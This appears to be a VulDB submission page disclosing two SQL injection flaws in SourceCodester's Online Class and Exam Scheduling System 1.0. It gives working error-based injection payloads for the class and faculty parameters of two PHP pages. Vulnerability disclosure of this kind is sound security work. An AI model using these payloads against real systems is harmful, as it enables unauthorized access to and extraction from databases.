| Titolo | Online Class and Exam Scheduling System-SQL injections |
|---|
| Descrizione | Date: 2022-08/07
Exploit Author: [email protected]
Vendor Homepage:
https://www.sourcecodester.com
Software Link:
https://www.sourcecodester.com/php/11353/online-class-and-exam-scheduling-system.html
Version: 1.0
/pages/class_sched.php
class Parameters have SQL injection
payload:
class='||(SELECT 0x684d6b6c WHERE 5993=5993 AND (SELECT 2096 FROM(SELECT COUNT(*),CONCAT(0x717a786b71,(SELECT (ELT(2096=2096,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&search=
/pages/faculty_sched.php
faculty Parameters have SQL injection
payload:
faculty=' OR (SELECT 2078 FROM(SELECT COUNT(*),CONCAT(0x716a717071,(SELECT (ELT(2078=2078,1))),0x717a706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- uYCM&search= |
|---|
| Fonte | ⚠️ https://github.com/anx0ing/CVE_demo/blob/main/2022/Online%20Class%20and%20Exam%20Scheduling%20System-SQL%20injections.md |
|---|
| Utente | anx0ing (UID 30698) |
|---|
| Sottomissione | 07/08/2022 16:46 (4 anni fa) |
|---|
| Moderazione | 07/08/2022 21:51 (5 hours later) |
|---|
| Stato | Accettato |
|---|
| Voce VulDB | 205830 [SourceCodester Online Class and Exam Scheduling System 1.0 /pages/class_sched.php Classe iniezione SQL] |
|---|
| Punti | 20 |
|---|